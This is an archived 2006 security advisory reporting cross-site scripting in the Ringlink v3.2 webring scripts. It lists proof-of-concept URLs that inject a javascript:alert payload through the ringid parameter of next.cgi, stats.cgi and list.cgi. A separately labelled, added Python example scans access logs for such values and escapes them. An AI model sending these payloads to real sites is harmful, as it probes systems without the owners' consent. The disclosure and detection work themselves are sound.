Computer Security
[EN] securityvulns.ru

From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date:11.06.2006
Subject:Ringlink v3.2 - XSS

Ringlink v3.2

Homepage:
http://www.ringlink.org

Affected files:
next.cgi
stats.cgi
list.cgi

XSS Vulnerability PoC:
http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]

http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]

http://www.example.com/ringlink/list.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
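
A defensive check for the issue reported above, as an added example that is not part of the original advisory or of Ringlink's code: it scans access-log lines for requests to the three affected scripts whose `ringid` value falls outside an allowlist, and returns the HTML-escaped form a fixed script should emit instead of the raw value. The allowlist pattern, the function name and the sample log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory as reflecting the ringid parameter.
AFFECTED = {"next.cgi", "stats.cgi", "list.cgi"}
# Assumption: legitimate ring IDs are short alphanumeric tokens.
SAFE_RINGID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_ringids(log_lines):
    """Return (script, decoded ringid, HTML-escaped ringid) for each request
    to an affected script whose ringid falls outside the allowlist."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        if script not in AFFECTED:
            continue
        # parse_qs percent-decodes values; keep_blank_values catches "ringid="
        for value in parse_qs(url.query, keep_blank_values=True).get("ringid", []):
            if not SAFE_RINGID.fullmatch(value):
                findings.append((script, value, html.escape(value, quote=True)))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jun/2006:10:00:01 +0000] "GET /ringlink/next.cgi?ringid=webring1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [11/Jun/2006:10:00:05 +0000] "GET /ringlink/stats.cgi?ringid=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 640',
    '192.0.2.12 - - [11/Jun/2006:10:00:09 +0000] "GET /ringlink/other.cgi?ringid=%3Cb%3E HTTP/1.1" 200 100',
    '192.0.2.13 - - [11/Jun/2006:10:00:12 +0000] "GET /ringlink/list.cgi?ringid=a%22%20b HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for script, raw, escaped in suspicious_ringids(SAMPLE_LOG):
        print(f"{script}: ringid={raw!r} -> render as {escaped!r}")
```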

© SecurityVulns, 3APA3A, Vladimir Dubrovin